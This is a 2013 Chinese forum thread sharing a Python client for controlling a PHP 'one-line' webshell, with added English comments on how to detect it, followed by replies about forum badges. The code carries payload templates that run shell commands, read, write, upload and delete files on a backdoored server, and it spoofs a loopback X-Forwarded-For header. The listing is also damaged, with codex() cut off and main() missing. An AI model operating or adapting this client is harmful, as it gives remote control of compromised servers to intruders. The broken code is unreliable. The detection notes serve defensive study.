lbw rood 一句话客户端。[复制链接]
发表于 2013-8-8 21:53:10 | 显示全部楼层
# -*- coding: utf-8 -*-
import httplib, sys
from base64 import b64encode
from urllib import urlencode

# Naming convention used by this script: module-level globals start with a
# capital letter.

# Working directory last reported by the remote side. Starts as False and is
# overwritten with the response body by inpu() and cd().
Ospath = False

# Static headers attached to every request this client sends.
# Detection note: both the User-Agent string and the X-Forwarded-For value are
# hard-coded, so an unmodified copy sends the same pair on every request. A
# loopback X-Forwarded-For arriving from an external peer is worth alerting
# on, and applications should not use this header for access decisions unless
# it is set by their own trusted proxy.
Header = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31',
    'X-Forwarded-For': '127.0.0.1',
}

# Server-side code templates, keyed first by target language and then by
# operation. The literal word 'command' in a template is a placeholder that
# cmdcmd() replaces before the text is sent ('command1'/'command2' are
# presumably handled the same way; that code is not visible in this listing).
#
# Defender notes:
# - The request functions below base64-encode these strings into a POST form
#   field, so a decoded request body that starts with the "safe" prefix is a
#   strong indicator of this client.
# - The file operations use ordinary PHP file functions rather than shell
#   calls, so restricting shell functions (php.ini disable_functions) does not
#   contain an installed stub on its own. The remedy is finding and removing
#   the server-side code that evaluates the posted field (not shown here).
code = {
    # PHP
    "php": {
        # Prefix prepended to every payload: hides error output and removes
        # the execution time limit.
        "safe": "@ini_set('display_errors','0');@set_time_limit(0);@set_magic_quotes_runtime(0);",
        # Run a shell command and echo its output.
        "shell": "echo shell_exec('command');",
        # Echo the current working directory.
        "getcwd": "echo getcwd();",
        # Change the working directory.
        "cd": "chdir('command');",
        # Echo the contents of a directory.
        "ls": "print_r(scandir('command'));",
        # Copy a file.
        "copy": "copy('command1','command2');",
        # Delete a file.
        "del": "unlink('command');",
        # Echo the raw bytes of a file.
        "down": "echo fread(fopen('command','rb'),filesize('command'));",
        # Write the posted 'files' field to a file.
        "up": "fwrite(fopen('command','wb'),$_POST['files']);",
        # Disabled in the original listing:
        # "wget":"fwrite(fopen('commandname','wb'),fopen('command','rb'))",
        # Alternative command-execution functions.
        "overshell": [
            "echo popen('command','r');",
            "echo exec('command');",
            "echo system('command');",
            "echo passthru('command');",
        ],
    },
    # Python: Django
    "python": {
        "safe": "from django.http import HttpResponse;",
        "shell": "import os;return HTTP(os.system('command'))",
        # (remaining entries omitted by the original author)
    },
}

def cmdcmd(shells, name, cmd):
    """Return the template stored under ``shells`` with ``name`` replaced by ``cmd``.

    The substitution is a plain ``str.replace``, so every occurrence of
    ``name`` in the template is replaced. ``Codes`` is not defined in the
    visible listing; presumably it is one of the per-language tables in
    ``code``, selected elsewhere.
    """
    template = Codes[shells]
    return template.replace(name, cmd)

def encrypt(command):
    """Return ``command`` base64-encoded.

    Despite the name, this is an encoding and not encryption: no key is
    involved, so anyone holding a request log or packet capture can recover
    the payload text by base64-decoding the form field.
    """
    encoded = b64encode(command)
    return encoded

def inpu():
    """Prompt the operator for the next command (a replacement for input()).

    Before prompting, one POST is sent that asks the remote side for its
    working directory; the response body, with backslashes turned into
    forward slashes, is stored in the global ``Ospath`` and shown as the
    prompt. ``Host``, ``Path``, ``Key`` and ``Codes`` are not defined in the
    visible listing.

    Detection note: this helper opens its own connection each time it runs,
    and its request carries a single form field named ``Key`` whose value is
    the base64 text of the payload.
    """
    global Ospath
    door = httplib.HTTPConnection(Host)
    # Start from the common prefix; only change directory when one is saved.
    tmpcode = Codes['safe']
    if Ospath:
        tmpcode += cmdcmd('cd','command',Ospath)
    tmpcode += Codes['getcwd']
    try:
        door.request('POST', Path, urlencode({Key:encrypt(tmpcode)}), Header)
    except:
        # Any failure while sending ends the program.
        print 'error not on ' + Host
        exit()
    reply = door.getresponse().read()
    Ospath = reply.replace('\\', '/')
    prompt = Ospath + ' >'
    command = raw_input(prompt)
    door.close()
    return command

def cd(door, command):
    """Change the remote working directory and remember the result in ``Ospath``.

    The payload first enters the saved directory, then the requested one, and
    finally echoes the resulting path; the raw response body becomes the new
    ``Ospath``. Returns None. ``Path``, ``Key`` and ``Codes`` are not defined
    in the visible listing.
    """
    global Ospath
    tmpcode = Codes['safe']
    tmpcode += cmdcmd('cd','command',Ospath)
    tmpcode += cmdcmd('cd','command',command)
    tmpcode += Codes['getcwd']
    form = urlencode({Key:encrypt(tmpcode)})
    door.request('POST', Path, form, Header)
    Ospath = door.getresponse().read()
    door.close()

def shell(door, command):
    """Send ``command`` for shell execution and return the response body.

    The payload enters the saved working directory (``Ospath``) before the
    'shell' template runs. ``Path``, ``Key`` and ``Codes`` are not defined in
    the visible listing.

    Detection note: the decoded form field contains the 'safe' prefix, a
    chdir() call and a shell_exec() call in that order when ``Codes`` is the
    PHP table.
    """
    global Ospath
    tmpcode = Codes['safe']
    tmpcode += cmdcmd('cd','command',Ospath)
    tmpcode += cmdcmd('shell','command',command)
    form = urlencode({Key:encrypt(tmpcode)})
    door.request('POST', Path, form, Header)
    reply = door.getresponse().read()
    door.close()
    return reply

def make(door, command):
    """Send operator-supplied script code as-is and return the response body.

    Unlike shell(), ``command`` is appended to the payload without going
    through a template; only the 'safe' prefix and the change into the saved
    working directory are added in front of it. ``Path``, ``Key`` and
    ``Codes`` are not defined in the visible listing.
    """
    global Ospath
    tmpcode = Codes['safe']
    tmpcode += cmdcmd('cd','command',Ospath)
    tmpcode += command
    form = urlencode({Key:encrypt(tmpcode)})
    door.request('POST', Path, form, Header)
    reply = door.getresponse().read()
    door.close()
    return reply

def codex(door, command, types):
    # Built-in (non-shell) script templates for file operations, meant to keep
    # the client usable when shell-execution functions are disabled remotely.
    if types == '@ls':
        # command appears to be the split input line: with only the verb
        # present, the saved working directory is listed, otherwise command[1].
        if len(command) == 1:
            inpath = Ospath
        else:
            inpath = command[1]
        tmpcode = Codes['safe']+cmdcmd('cd','command',Ospath)+cmdcmd('ls','command',inpath)
    # NOTE(review): the listing is damaged from this point. The rest of codex()
    # and the beginning of main() are missing on the page; the lines below
    # reference `cmd`, which codex() never defines, so they appear to be the
    # tail of main()'s command dispatch. The code is not runnable as shown.
    elif types == '@ls':
            print codex(door,cmd,cmd[0])
        elif cmd[0] == '@copy' or cmd[0] == '@del' or cmd[0] == '@down' or\
        cmd[0] == '@up':# or cmd[0] == '@wget':
            print codex(door,cmd[1],cmd[0])
        else:
            print shell(door,command)

# Script entry point. main() is not defined anywhere in the visible listing
# (its body was lost where the listing is damaged above).
if __name__ == '__main__':
    main()

发表于 2013-8-8 22:07:51 | 显示全部楼层
感谢分享
帮你改成代码模式了
发表于 2013-8-10 09:05:27 | 显示全部楼层
抚菊深思 发表于 2013-8-8 22:07
感谢分享
帮你改成代码模式了

求勋章,有些地方进不去,纠结死了。

发表于 2013-8-10 09:07:26 | 显示全部楼层
小男孩 发表于 2013-8-10 09:05
求勋章,有些地方进不去,纠结死了。

勋章中心可以自己申请
发表于 2013-8-10 10:55:40 | 显示全部楼层
抚菊深思 发表于 2013-8-10 09:07
勋章中心可以自己申请

3个人工授予的,一个600个JB,不能这样。。。
